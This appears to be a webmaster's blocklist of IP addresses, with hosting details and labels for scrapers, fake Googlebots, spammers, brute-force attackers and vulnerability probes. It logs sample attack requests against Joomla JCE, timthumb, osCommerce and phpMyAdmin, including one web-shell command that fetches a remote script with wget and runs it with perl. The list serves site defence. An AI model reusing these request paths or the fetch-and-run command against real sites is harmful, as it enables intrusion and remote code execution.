Examples: URL//&sa=U&ei=-BCdUqCLIsOihgejtIHgDQ&ved=
0CNwCEBYwPg&usg=AFQjCNFYEzdL-QQMRboeQfiO707TUv6nYw
//images/stories/itil.php?rf
173.254.219.250 Hostname: 173.254.219.250.static.quadranet.com
Host: United States – Los Angeles Oc3 Networks & Web Solutions Llc
Hacker probing for vulnerabilities
/+\”host-care.com\”&num=100&hl=en&lr=&ct=clnk&sa=U&ei=
nBGeUuHkAdCgsATMvYGoDA&ved=0CC0QIDAAOGQ&usg=
AFQjCNH8Iv285aKqjoDhpIw_9tQQOlaIIw
184.175.135.212 Hostname: remote.americanwaste.org
Host: United States – Kalkaska American Waste
Brute force dictionary attacker
162.243.9.72 Host: United States – New York City Digital Ocean Inc. Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0;
+http: //www.200please.com/bot)
54.232.100.158 Hostname: ec2-54-232-100-158.sa-east-1.compute.amazonaws.com
Host: Brazil – Sao Paulo Amazon.com Inc.
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0;
+http: //www.200please.com/bot)
50.112.126.117 Hostname: ec2-50-112-126-117.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
Web server: 3 websites – 200plz.com , grepnetstat.com , qrcodegener.com
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0;
+http: //www.200please.com/bot)
54.252.97.95 Hostname: ec2-54-252-97-95.ap-southeast-2.compute.amazonaws.com
Host: Australia – Sydney Amazon.com Inc.
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0;
+http: //www.200please.com/bot)
54.249.240.15 Hostname: ec2-54-249-240-15.ap-northeast-1.compute.amazonaws.com
Host: Japan – Tokyo Amazon.com Inc.
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0;
+http: //www.200please.com/bot)
54.208.110.38 Hostname: ec2-54-208-110-38.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web scraper / Feed embedder
GermCrawler
172.246.33.37 Hostname: 37.33-246-172.rdns.scalabledns.com
Host: United States – Henderson Enzu Inc
Web server: 11 websites
DoS attack
46.137.98.159
Hostname: ec2-46-137-98-159.eu-west-1.compute.amazonaws.com
Host: Ireland – Dublin Amazon Data Services Ireland Ltd
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0;
+http: //www.200please.com/bot)
175.126.62.151 Host: Korea, Republic Of – Seoul Hanaro Telecom
Web server: 2 websites – dy2004.com , usbas.com
Brute force dictionary attacker
193.253.48.160 Hostname: LMontsouris-656-01-125-160.w193-253.abo.wanadoo.fr
Host: France – Neuilly-sur-seine Orange S.a.
Web server: 2 websites – eckplantes.fr , k-commerce.fr
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
46.4.109.29 Hostname: www .wissenschaftsberater.com
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 3 websites – wissenschaftsberater.com , wissenschaftsberater.net , wissenschaftsberater.org
Hacker – Looking for Joomla JCE Editor exploit
Examples: /images/stories/canz.php/images/stories/localhosts.php?cmd=wget%20http:
//twilightaffairs.com.au/administrator/includes/pcl/robot.txt;perl%20robot.txt;
perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20robot.txt
94.132.250.217 Hostname: a94-132-250-217.cpe.netcabo.pt
Host: Portugal Lisbon Tvcabo Portugal S.a.
Faking Googlebot user agent
62.108.119.131 Hostname: ns1.teledot.net
Host: Serbia – Subotica Drustvo Za Telekomunikacije Verat D.o.o Bulevar Vojvode Misica 37
Web server: 2 websites – td.rs , teledot.net
Hacker – Looking for Joomla JCE Editor exploit
Examples: /images/stories/beHbeTT.php?rf
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
54.208.26.43 Hostname: ec2-54-208-26-43.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
GermCrawler – scraper bot
94.20.94.140 Hostname: baku.dot.az
Host: Azerbaijan – Baku Delta Telecom Ltd
Web server: 147 websites
Hacker – Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager
&file=imgmanager&version=1576&cid=20
182.151.128.46 China – Chengdu Chinanet Sichuan Province Network Hacker – Looking for uploadify RFI exploit
Examples: /wp-content/themes/frankentheme/library/js/uploadify/uploadify.css?
/wp-content/themes/vithy/sprites/js/uploadify/uploadify.css?
/wp-content/plugins/wp-symposium/uploadify/uploadify.css?
42.120.161.96 China – Hangzhou Aliyun Computing Co. Ltd YisouSpider
162.243.81.195 Host: United States – New York City Digital Ocean Inc. Spbot – SEO spy bot
Mozilla/5.0 (compatible; spbot/4.0.2; +http: //www.seoprofiler.com/bot )
178.255.197.24 Hostname: server2.qprivate.nl
Host: Netherlands – Rotterdam Qweb Internet Services B.v.
Web server: 70 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Examples: /images/stories/cliti.php?rf
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&version=1576&cid=20
69.174.242.99 Hostname: darwoft.com
Host: United States – San Antonio Serverbeach
Web server: 5 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager
&file=imgmanager&version=1576&cid=20
//images/stories/localhost.php?rf
81.50.199.177 Hostname: ANantes-657-1-60-177.w81-50.abo.wanadoo.fr
Host: France – Nancy Orange S.a.
Spammer
Bad user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
46.105.228.164 Hostname: filesbomb.com
Host: France – Roubaix Ovh Systems
Web server: 3 websites – filesbomb.biz , filesbomb.com , filesbomb.in
Spammer
Bad host
46.165.196.138 Host: Germany – Frankfurt Am Main Leaseweb Germany Gmbh Malicious user agent: curl/7.27.0
Scanning for phpMyAdmin remote code execution exploits:
Example: /pma/?-s
117.20.100.1 Hostname: aa106.secure.ne.jp
Host: Japan – Tokyo Kddi Web Communications Inc
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/*******/timthumb.php?src=http:
//blogger.com.audreymendozamakeup.com/img.php
Fake user agents:
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
37.143.9.118 Hostname: hosted-by.ihc.ru
Host: Russian Federation – Moscow Internet-hosting Ltd
Web server: 14 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/*******/timthumb.php?src=http:
//blogger.com.audreymendozamakeup.com/img.php
Fake user agents:
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
212.53.144.38 Hostname: helikraft.com
Host: Germany – Hamburg Artfiles Ip Network
Web server: 1 website – helikraft.com
Hacker – Looking for Joomla JCE editor exploit
Examples: images/stories/mey.php
images/stories/metri.php
images/stories/robot.php
images/stories/stories.php
78.162.69.97 Hostname: 78.162.69.97.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force / dictionary attack on wp-login
Bad host
69.197.166.174 Host: United States – Kansas City Pradeep Sharma Comment spammer
88.190.25.228 Hostname: sd-30437.dedibox.fr
Host: France – Lyon Dedibox Sas.
Web server: 1 website – mon-guide-achat.fr
Brute force / dictionary attack on wp-login
66.249.93.186 Hostname: google-proxy-66-249-93-186.google.com
Host: United States – Mountain View Google Inc.
User agent: Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google (+https://developers.google.com/+/web/snippet/)
Hotlinker
199.187.122.91 Host: United States – Philadelphia Mystik Media
Web server: 1 website – sheerexplorer.com
Scraper bot
75.101.163.248 Hostname: ec2-75-101-163-248.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web server: 10 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
85.214.138.248 Hostname: mail.load-time.com
Host: Germany – Berlin Strato Ag
Web server: 3 websites – check.bz , load-time.com , sinnloseseite.de
LoadTimeBot/0.7
Mozilla/5.0 (compatible; LoadTimeBot/0.7; +http://www.load-time.com/bot.html)
87.238.192.72 Hostname: sh2072.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Web server: 1576 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Example: /index.php?option=com_jce&task=plugin&plugin=
imgmanager&file=imgmanager&version=1576&cid=20
192.114.71.13 Hostname: bzq-114-71-13.static.bezeqint.net
Host: Israel – Petah Tikva Bezeq International Previously Trendline
Scraper bot
188.34.134.80 Host: Iran – Tehran Asre Enteghal Dadeha Scraper / spammer
173.208.129.211 Host: United States – Kansas City Datashack Internal Servers Comment spammer
198.50.176.167 Host: Canada – Montreal Ovh Comment spammer
Bad host
162.243.110.96 Host: United States – New York City Digital Ocean Inc. Spbot – SEO spy bot
Mozilla/5.0 (compatible; spbot/4.0.2; +http: //www.seoprofiler.com/bot )
78.46.114.178 Hostname: static.178.114.46.78.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 27 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
162.210.196.100 Hostname: hosted-by.leaseweb.com
Host: United States – Manassas Leaseweb Usa Inc.
MAJESTIC Spy bot
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.4; http: //www.majestic12.co.uk/bot.php?+)
41.142.243.102 Host: Morocco – Rabat Ip Adsl Maroctelecom Suspicious activity – looking for URL/+\”nseasy.com\”&num= PLUS LONG STRING
130.75.16.19 Hostname: gcwn19.d-grid.uni-hannover.de
Host: Germany – Hannover Gottfried Wilhelm Leibniz Universitaet Hannover
Malicious user agent:
PycURL/7.19.0.2 libcurl/7.22.0
62.149.23.159 Hostname: ns1.la-primavera.net
Host: Ukraine – Mariupol’ Colocall Ltd.
Web server: 12 websites
Malicious user agent: libwww-perl/6.02
Hacker trying to exploit known Joomla Open Flash Chart arbitrary file upload vulnerability
Examples: //administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=bhl.php
//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bhl.php
//administrator/components/com_jinc/classes/graphics/tmp-upload-images/bhl.php?rf
//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/bhl.php?rf
95.56.234.62 Hostname: www .krosoft.pl
Host: Kazakhstan – Almaty Jsc Kazakhtelecom Direction Of Information System
Web server: 5 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
94.232.217.25 Hostname: www .krosoft.pl
Host: Poland – Krosno Krosnienskie Centrum Informatyczne Krosoft
Web server: 5 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
109.11.122.15 Hostname: 15.122.11.109.rev.sfr.net
Host: France – Boulogne-billancourt Societe Francaise Du Radiotelephone S.a.
Bad User Agent
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36
Squider/0.01
178.168.82.85 Hostname: 178-168-82-85.starnet.md
Host: Moldova – Chisinau Starnet S.r.l
Rogue bot – Mozilla/4.0 (compatible; ICS)
5.9.113.10 Hostname: n10c6.007ac9.net
Host: Germany – Nuremberg Hetzner Online Ag
Apache-HttpClient/4.3 (java 1.5)
212.247.18.197
Hostname: static-212-247-18-197.cust.tele2.se
Host: Sweden – Stockholm It-relation Ects Ab
Unknown bot
User agent – another
176.28.55.107 Hostname: server3.cubehost.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 33 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
5.9.27.74 Hostname: 5-9-27-74.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 1 website – multicopter24.de
Hosting Sistrix crawler
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
109.228.17.95 Hostname: server109-228-17-95.live-servers.net
Host: United Kingdom – Gloucester Fast Hosts Ltd
Web server: 7 websites
Hacker – Looking for Joomla JCE editor exploit vulnerability
/images/stories/borong.gif
212.71.128.179 Host: Czech Republic – Ceske Budejovice Ipex A.s Hacker – Looking for WordPress timthumb RFI exploit
//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=
184.82.29.169 Hostname: 184-82-29-169.superslickydeals.com
Host: United States – Scranton Prime Directive Llc
Web server: 1 website – kids-jumpers.com
Hosting some sort of scraper bot
54.224.191.159 Hostname: ec2-54-224-191-159.compute-1.amazonaws.com
Host: United States – Ashburn Amazon Technologies Inc.
FlipboardProxy
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2;
+http: //flipboard.com/browserproxy)
50.18.102.132 Hostname: ec2-50-18-102-132.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon.com Inc.
Google-HTTP-Java-Client/1.17.0-rc (gzip)
Another bot piggy-backing Twitter bot
23.29.122.195 Host: United States – Dallas Incero Llc MetaURI
MetaURI API/2.0 +metauri.com
Another bot piggy-backing Twitter bot
184.169.226.84 Hostname: ec2-184-169-226-84.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon.com Inc.
JS-Kit URL Resolver
JS-Kit URL Resolver, http: //js-kit.com/
Another bot piggy-backing Twitter bot
46.236.24.48 Hostname: ded3120.sysms.net
Host: United Kingdom – Reading Mediasift
TweetmemeBot
Mozilla/5.0 (compatible; TweetmemeBot/3.0; +http: //tweetmeme.com/)
Another bot piggy-backing Twitter bot
98.137.207.111 Hostname: h047.llfs.bf1.yahoo.com
Host: United States – Lockport Yahoo! Inc.
Scraper bot NING/1.0
Another bot piggy-backing Twitter bot
23.22.166.58 Hostname: ec2-23-22-166-58.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Malicious user agent Java/1.6.0_31
Scraper bot ShareThisFetcher/0.1.2
Another bot piggy-backing Twitter bot
46.4.209.18 Hostname: static.18.209.4.46.clients.your-server.de
Host: Germany Gunzenhausen Daniil Mosco.
Web server: 21 websites
Web server – no business pinging another site
37.115.188.210 Hostname: 37-115-188-210-broadband.kyivstar.net
Host: Ukraine – Kiev Kyivstar Pjsc
Hacker – Brute force dictionary attacker
Looking for Bitrix vulnerability
DOS attack lasted for more than 5 hours
More info
108.175.154.219 Hostname: barnacle.arvixe.com
Host: United States – San Mateo Arvixe Llc
Hacker – Looking for Joomla JCE editor exploit vulnerability
/images/stories/localhost.php?rf
77.222.56.203 Hostname: vh81.sweb.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Web server: 1060 websites
Hacker – Looking for Joomla JCE editor exploit vulnerability
/images/stories/cr0t.php?conf
/images/stories/70cpx.php
85.108.237.208 Hostname: 85.108.237.208.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Hacker – Brute force dictionary attacker
Looking for Bitrix vulnerability
68.168.144.26 Hostname: nfdc230.nfdc.net
Host: United States – Woodstock Nfdc Internet
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.235.57.208 Hostname: leclub.com.ve
Host: United States Las Vegas Las Vegas Nv Datacenter
Web server: 2 websites – g5mc.com , leclub.com.ve
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
201.55.31.141 Host: Brazil Santo Andre Cia Proc. De Dados Do Estado De S Paulo – Prodesp Faking Googlebot user agent
189.106.165.31 Hostname: 189-106-165-31.user.veloxzone.com.br
Host: Brazil Rio De Janeiro Telemar Norte Leste S.a.
Faking Googlebot user agent
177.103.247.248 Hostname: 177-103-247-248.dsl.telesp.net.br
Host: Brazil Sao Paulo Telefonica Brasil S.a
Faking Googlebot user agent
177.106.86.125 Hostname: 177-106-086-125.xd-dynamic.ctbcnetsuper.com.br
Host: Brazil Uberaba Companhia De Telecomunicacoes Do Brasil Central
Faking Googlebot user agent
150.165.210.54 Host: Brazil Campina Grande Universidade Federal Da Paraiba Faking Googlebot user agent
148.235.151.185 Hostname: customer-148-235-151-185.uninet-ide.com.mx
Host: Mexico Mexico City Uninet S.a. De C.v.
Faking Googlebot user agent
186.212.213.40 Hostname: 186.212.213.40.static.host.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
189.59.58.81 Hostname: 189.59.58.81.dynamic.adsl.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
186.215.36.87 Hostname: 186.215.36.87.static.host.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
200.217.16.178 Host: Brazil Rio De Janeiro Telemar Norte Leste S.a. Faking Googlebot user agent
200.195.165.122 Hostname: srvmail.ricopecas.com.br
Host: Brazil Curitiba Rico Componentes Eletronicos
Faking Googlebot user agent
200.170.228.194 Hostname: mail.mutuadosmagistrados.com.br
Host: Brazil Rio De Janeiro Mutua Dos Magistrados Do Estado Do Rj
Faking Googlebot user agent
177.17.87.77 Hostname: 177.17.87.77.static.host.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
181.48.9.61 Host: Colombia Bogota Telmex Colombia S.a. Faking Googlebot user agent
200.133.123.253 Host: Brazil Rio De Janeiro Associacao Rede Nacional De Ensino E Pesquisa Faking Googlebot user agent
189.91.60.130 Hostname: mail.ibrati.org.br
Host: Brazil Sao Paulo Keraxweb Servicos De Interligacao E Internet Ltda.
Faking Googlebot user agent
179.154.224.122 Hostname: b39ae07a.virtua.com.br
Host: Brazil – Sao Paulo Net Servicos De Comunicacao S.a.
Faking Googlebot user agent
128.140.228.66 Hostname: gts.squadmedia.com
Host: Romania – Bucharest Gts Telecom Srl
Web server: 66 websites
Spammer
41.13.12.185 Hostname: vc-nat-gp-s-41-13-12-185.umts.vodacom.co.za
Host: South Africa – Johannesburg Legal Ip Block For Internet Apn – Midrand Park Southern Gauteng
Identified as Dictionary attacker in Project Honeypot records
5.9.127.154 Hostname: 5-9-127-154.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
Sistrix Crawler
5.10.83.19 Hostname: 5.10.83.19-static.reverse.softlayer.com
Host: Netherlands – Amsterdam Softlayer Dutch Holdings Bv
AHREFS spybot
14.155.209.41 Host: China – Guangzhou Chinanet Guangdong Province Network Web scraper bot
54.237.67.181 Hostname: ec2-54-237-67-181.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Linkdex SEO spy bot
72.13.254.226 Hostname: 226-254-13-72.static.cosmoweb.net
Host: United States – New York City Transbeam Inc.
Malicious user agent:
Java/1.7.0_45
204.236.248.1 Host: United States – Ashburn Amazon.com Inc. RavenCrawler SEO spy bot
186.212.87.136 Hostname: 186.212.87.136.static.host.gvt.net.br Global Village Telecom Faking Googlebot user agent
177.12.89.41 Host: Brazil – Natal J M Da Silva Internet – Me Faking Googlebot user agent
177.0.204.250 Host: Brazil – Brasilia Brasil Telecom S/a – Filial Distrito Federal Faking Googlebot user agent
54.218.191.90 Hostname: ec2-54-218-191-90.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
Malicious user agent:
Python-urllib/2.7
76.20.111.106 Hostname: c-76-20-111-106.hsd1.ca.comcast.net
Host: United States – Tracy Comcast Cable Communications Inc.
Forbidden user agent: Xenu Link Sleuth
50.193.50.145 Hostname: 50-193-50-145-static.hfc.comcastbusiness.net
Host: United States – Mountain View Comcast Cable Communications Holdings Inc
Malicious user agent:
Python-urllib/2.7
210.213.59.125 Host: Thailand – Bangkok Truehisp
Hostname: 210-213-59-125.static.asianet.co.th
Faking Googlebot user agent
58.137.145.248 Host: Thailand – Bangkok Mitr Phol Sugar Corp. Ltd. Faking Googlebot user agent
200.103.247.219 Hostname: 200-103-247-219.ctame705.dsl.brasiltelecom.net.br
Host: Brazil – Brasilia Brasil Telecom S/a – Filial Distrito Federal
Faking Googlebot user agent
174.129.237.157 Hostname: ec2-174-129-237-157.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
User agent: ia_archiver (+http: //www.alexa.com/site/help/webmasters; crawler @alexa.com)
ia_archiver bot
Rule breaker – doesn’t get or ignores robots.txt
46.105.24.12 Hostname: vps17562.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 5 websites
Fake Bingbot user agent
Bad host
151.237.190.139 Host: Sweden – Stockholm Deepak Mehta Fie Spammer
Bad host
198.27.64.145 Hostname: ks4004731.ip-198-27-64.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer – multiple hits on honeypot trap
Bad host
212.253.240.194 Hostname: asy194.as253240.sol.superonline.com
Host: Turkey – Atasehir Superonline Inc.
Dictionary attack on WordPress admin
54.205.95.28 Hostname: ec2-54-205-95-28.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Bad bot: Not a recognised search engine or human browser
CloudACL/Nutch-1.4
119.18.60.252 Host: India – Mumbai Ip Address Pool
Web server: 6 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
194.38.104.47 Hostname: mail.szuper.info.hu
Host: Hungary – Budapest Budapest
Web server: 314 websites
Hacker – Malicious bot: BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit vulnerability
107.6.95.15 Hostname: secure.onavo.com
Host: United States – New York City Voxel Dot Net Inc.
Non-browser user agent: ICAP-IOD
189.38.90.17 Hostname: web417.uni5.net
Host: Brazil – Porto Alegre Ipv6 Internet Ltda
Web server: 747 websites
Image hotlinker
5.10.83.84 Hostname: 5.10.83.84-static.reverse.softlayer.com
Host: Netherlands – Amsterdam Softlayer Dutch Holdings Bv
Part of Ahrefs spy network
ahrefsbot
91.199.151.76 Hostname: www .onebyte.net
Host: United Kingdom – London Iomart Group Plc
Web server: 5 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
87.76.31.97 Host: United Kingdom – Byfleet Future Hosting Llc
Web server: 1 website – jfcboughton.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.150.164 Hostname: s15437445.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet A
Botnet attacking wpOnlineStore/osCommerce/Zencart
208.125.177.174 Hostname: rrcs-208-125-177-174.nys.biz.rr.com
Host: United States – Buffalo Time Warner Cable Internet Llc
Web server: 4 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
198.27.64.185 Hostname: ks4004771.ip-198-27-64.net
Host: Canada – Montreal Ovh Hosting Inc.
Web server: 1 website – location-villa-luxe-marrakech.com
Spam-bot
Bad host
87.106.191.250 Hostname: s15353499.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 166 websites
Spammer – looking for non-existent /xmlrpc.php
68.156.7.26 Hostname: 26.0.7.156.68.in-addr.arpa
Host: United States – Buford Colorvision Graphics Inc – Asm Lan
Web server: 28 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
110.86.184.10 Host: China – Fuzhou Chinanet Fujian Province Network Hacker – Looking for file upload vulnerability in WordPress image Manager
/wordpress-image-manager/images/secure.php
/wordpress-image-manager/signup.php
206.191.25.90 Hostname: smtp2.mailstratus.ca
Host: Canada – Ottawa Dnsnetworks
Web server: 28 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.199.204.15 Hostname: corebulk.com
Host: Turkey – Izmit Aerotek Bilisim Taahhut Sanayi Ve Ticaret Limited Sirketi
Web server: 1 website – corebulk.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
87.118.92.5 Hostname: ns.km23726-02.keymachine.de
Host: Germany – Erfurt Keyweb Ag
Botnet attacking wpOnlineStore/osCommerce/Zencart
85.10.136.115 Hostname: wpc4375.amenworld.com
Host: France – Paris Amen
Web server: 4 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.197.215 Hostname: s15387689.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – iwebmanage.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.154.98 Hostname: s15449159.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 2 websites – reasonwhy.es , reasonwhy.info
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.150.228 Hostname: s15440330.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 6 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
81.169.137.117 Hostname: edv-48.com
Host: Germany – Berlin Strato Ag
Web server: 3 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
80.86.90.13 Hostname: euve2242.vserver.de
Host: Germany – Hurth Intergenia Ag
Web server: 2 websites – silesia-aroma.com , world-of-flavor.de
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
72.249.65.50 Host: United States – Saint Louis Real Web Host
Web server: 37 website – bcmempleo.org
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
68.168.144.26 Hostname: nfdc230.nfdc.net
Host: United States – Woodstock Nfdc Internet
Botnet attacking wpOnlineStore/osCommerce/Zencart
62.75.157.159 Hostname: euve22130.startvps.com
Host: Germany – Berlin Intergenia AgDedicated Services
Web server: 1 website – bcmempleo.org
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
212.227.127.37 Hostname: infong288.kundenserver.de
Host: Germany Karlsruhe 1&1 Internet Ag
Botnet attacking wpOnlineStore/osCommerce/Zencart
188.165.201.5 Hostname: ns210177.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 2 websites – giphar.com , gipharmagazine.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
117.120.2.129 Host: Singapore – Singapore Readyspace Infra And Dedicated Services
Web server: 25 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
117.120.2.111 Host: Singapore – Singapore Readyspace Infra And Dedicated Services Botnet attacking wpOnlineStore/osCommerce/Zencart
Bad host
109.200.2.66 Hostname: 66-2-200-109.rackcentre.redstation.net.uk
Host: United Kingdom – Gosport Redstation Limited
Botnet attacking wpOnlineStore/osCommerce/Zencart
Bad host
107.6.147.100 Hostname: cutepayal.aileec.com.147.6.107.in-addr.arpa
Host: United States – Chicago Singlehop Inc.
Web server: 5 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
188.165.35.135 Hostname: hosting03.epixelic.net
Host: France – Roubaix Ovh Systems
Web server: 141 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.171.72.135 Hostname: oberon.killoch.net
Host: United Kingdom – Barr Barr Ltd
Web server: 25 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
66.7.220.208 Hostname: server.dedicadomvf3.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 562 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
66.7.196.158 Hostname: dime185.dizinc.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 1169 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
186.202.153.33 Hostname: hm6734.locaweb.com.br
Host: Brazil – Sao Joao Batista Locaweb Servicos De Internet S/a
Web server: 355 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
193.224.99.243 Host: United States – Mountain View Outofwall Inc.
Web server: 1 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
54.205.219.6 Hostname: ec2-54-205-219-6.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
